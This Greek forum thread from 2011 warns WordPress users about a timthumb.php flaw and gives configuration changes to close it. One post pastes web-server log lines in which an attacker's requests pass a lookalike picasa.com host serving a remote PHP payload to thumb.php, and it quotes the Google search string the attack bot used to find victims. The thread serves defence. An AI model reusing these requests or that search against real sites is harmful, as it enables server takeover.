Πώς να ΜΗΝ σας χακάρουν το timthumb.php

WordPress Themes

Συντονιστές: WebDev Moderators, Super-Moderators, PHP Moderators

Απάντηση

Το βρήκατε χρήσιμο αυτό το post;

Ναι
2
50%
Όχι
2
50%
 
Σύνολο ψήφων: 4

kapoios001
Δημοσιεύσεις: 403
Εγγραφή: 17 Φεβ 2011 12:26

Πώς να ΜΗΝ σας χακάρουν το timthumb.php

Δημοσίευση από kapoios001 » 22 Νοέμ 2011 03:57

ΠΑΡΑ ΠΟΛΥ ΣΗΜΑΝΤΙΚΟ!

Όσοι έχουν θέμα Wordpress που να χρησιμοποιεί το timthumb (link) για να μην αρχίσουν να τραβάνε τα μαλλιά τους να κάνουν αυτό:

βρείτε αυτό:

Κώδικας: Επιλογή όλων

define ('ALLOW_EXTERNAL', TRUE);
κάντε το έτσι:

Κώδικας: Επιλογή όλων

define ('ALLOW_EXTERNAL', FALSE);
Αυτό είναι για να μην επιτρέπει να κατεβάσει εικόνες από άλλα host.

Δείτε αν υπάρχει αυτό (αν όχι πρέπει να το κάνετε σε false):

Κώδικας: Επιλογή όλων

define ('ALLOW_ALL_EXTERNAL_SITES', false);
Αυτό είναι για να μην επιτρέπει τα ξένα sites (εξωτερικά host)

Τώρα βρείτε αυτό:

Κώδικας: Επιλογή όλων

$ALLOWED_SITES = array (
		'flickr.com',
		'picasa.com',
		'img.youtube.com',
		'upload.wikimedia.org',
		'photobucket.com',
		'imgur.com',
		'imageshack.us',
		'tinypic.com',
	);
Και κάντε το έτσι:

Κώδικας: Επιλογή όλων

$ALLOWED_SITES = array ();
με αυτόν τον τρόπο δεν επιτρέπουμε κανένα εξωτερικό site.

Το πρόβλημα είναι ότι το timthumb.php έχει ένα λάθος τρόπο να χειρίζετε τα εξωτερικά αρχεία. Αυτό υποθέτει ότι είναι εικόνες αλλά με ένα κόλπο μπορούν να ανεβάσουν μια εικόνα που έχει "κολλημένο" PHP κώδικα.

Ο ιός είναι πολύ σοβαρός και μπορεί να βρει όλους τους κωδικούς του server, να δει όλες τις ρυθμίσεις του server, να κάνει bypass τις ρυθμίσεις ασφαλείας, δημιουργεί πίσω πόρτες και αντιγράφει τον εαυτό του παντού σε όλο το server και τον μολύνει τελείως.

Τα αρχεία που θα πρέπει να διαγράψετε είναι:
μέσα στο cache του timthumb:
- external_*

μέσα στον φάκελο που βρίσκεται το timthumb.php:
inc.php
data.php


Ο τύπος είναι μπιπ και το έχει βάλει στο pastebin: http://pastebin.com/SWgYAm1S

Χρησιμοποιεί κάτι φθηνά κολπάκια αλλά με τις παραπάνω αλλαγές που σας είπα θα είστε ασφαλείς.

Εγώ για να είμαι 100% σίγουρος άλλαξα το script ώστε να μην κατεβάζει ΚΑΘΟΛΟΥ εικόνες από ξένα host (γιατί πάλι μπορεί να υπάρχει κάπου ένα κενό ακόμα και να μην το έχουμε δει).

Ο τύπος είναι ο "κύριος" 89.145.121.101 (server2.estrobinario.com) και εδώ είναι το αρχείο του: h**p://picasa.com.portaldoheavymetal.org/timpatcher.php

Από το log file μου:

Κώδικας: Επιλογή όλων

89.145.121.101 - - [20/Nov/2011:15:45:21 +0200] "GET /tag/history/ h**p/1.1" 200 56134 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.145.121.101 - - [20/Nov/2011:15:45:22 +0200] "GET /tag/history/wp-content/themes/folder/thumb.php?src=h**p://picasa.com.portaldoheavymetal.org/timpatcher.php h**p/1.1" 404 35676 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.145.121.101 - - [20/Nov/2011:15:45:23 +0200] "GET / h**p/1.1" 200 68717 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.145.121.101 - - [20/Nov/2011:15:45:24 +0200] "GET /wp-content/themes/folder/thumb.php?src=h**p://picasa.com.portaldoheavymetal.org/timpatcher.php h**p/1.1" 400 142 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.145.121.101 - - [20/Nov/2011:15:45:24 +0200] "GET /tag/ h**p/1.1" 404 35567 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.145.121.101 - - [20/Nov/2011:15:45:25 +0200] "GET /tag/wp-content/themes/folder/thumb.php?src=h**p://picasa.com.portaldoheavymetal.org/timpatcher.php h**p/1.1" 404 35668 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
ΕΥΤΥΧΩΣ που δεν έκανε κάτι άλλο γιατί είναι ΠΟΛΥ ΣΟΒΑΡΟΣ ΙΟΣ!

ΔΙΑΔΩΣΤΕ ΤΟ ΚΑΙ ΚΑΝΤΕ ΤΙΣ ΑΛΛΑΓΕΣ!


Αυτό είναι ένα bot που τρέχει και βρίσκει τους "ευάλωτους" μέσω του Google (γράφει: inurl:timthumb ext:php -site:googlecode.com -site:google.com)

και σκανάρει ένα-ένα τα αποτελέσματα (αυτή τη στιγμή έχει 218.000 αποτελέσματα). Κάνει χειρουργικά μερικά request, και μετά αν θέλει ο δημιουργός του μπαίνει στον server σας και σας τα κάνει όλα "καινούργια".

Ελπίζω να μην την πάθετε.

Υ.Γ.: αυτός που έκανε το timthumb.php δεν μπορούσε να κάτσει ήσυχος στ' αυγά του και να μην έφτιαχνε αυτό το δημιούργημα; Το κακό είναι ότι χιλιάδες wordpress templates το χρησιμοποιούν λες και είναι τίποτα το σημαντικό... Που να πάρει δηλ...

gflyer
Δημοσιεύσεις: 1
Εγγραφή: 02 Αύγ 2003 22:13

Πώς να ΜΗΝ σας χακάρουν το timthumb.php

Δημοσίευση από gflyer » 16 Ιαν 2012 00:27

είναι κάτι αυτό το script που το έχει το wordpress από κατασκευής ή το βάζουμε εμείς? Κι αν είναι από κατασκευής πως ελέγχουμε αν τρέχει?

Άβαταρ μέλους
bibisidis
Honorary Member
Δημοσιεύσεις: 924
Εγγραφή: 07 Ιούλ 2010 03:32

Πώς να ΜΗΝ σας χακάρουν το timthumb.php

Δημοσίευση από bibisidis » 16 Ιαν 2012 00:44

WordPress Timthumb.php Vulnerability Scanner Plugin

http://wordpress.org/extend/plugins/tim ... y-scanner/

1. Upload
2. Activate
3. Visit the "Timthumb Scanner" page under the "Tools" Menu

Το plugin αυτό αναβαθμίζει το timthumb σε νεότερη ασφαλή έκδοση.

Το timthumb δεν υπάρχει μόνο σε themes αλλά χρησιμοποιείται και από plugins.

Απάντηση

Επιστροφή στο “WordPress Themes”

Μέλη σε σύνδεση

Μέλη σε αυτήν τη Δ. Συζήτηση: Δεν υπάρχουν εγγεγραμμένα μέλη και 0 επισκέπτες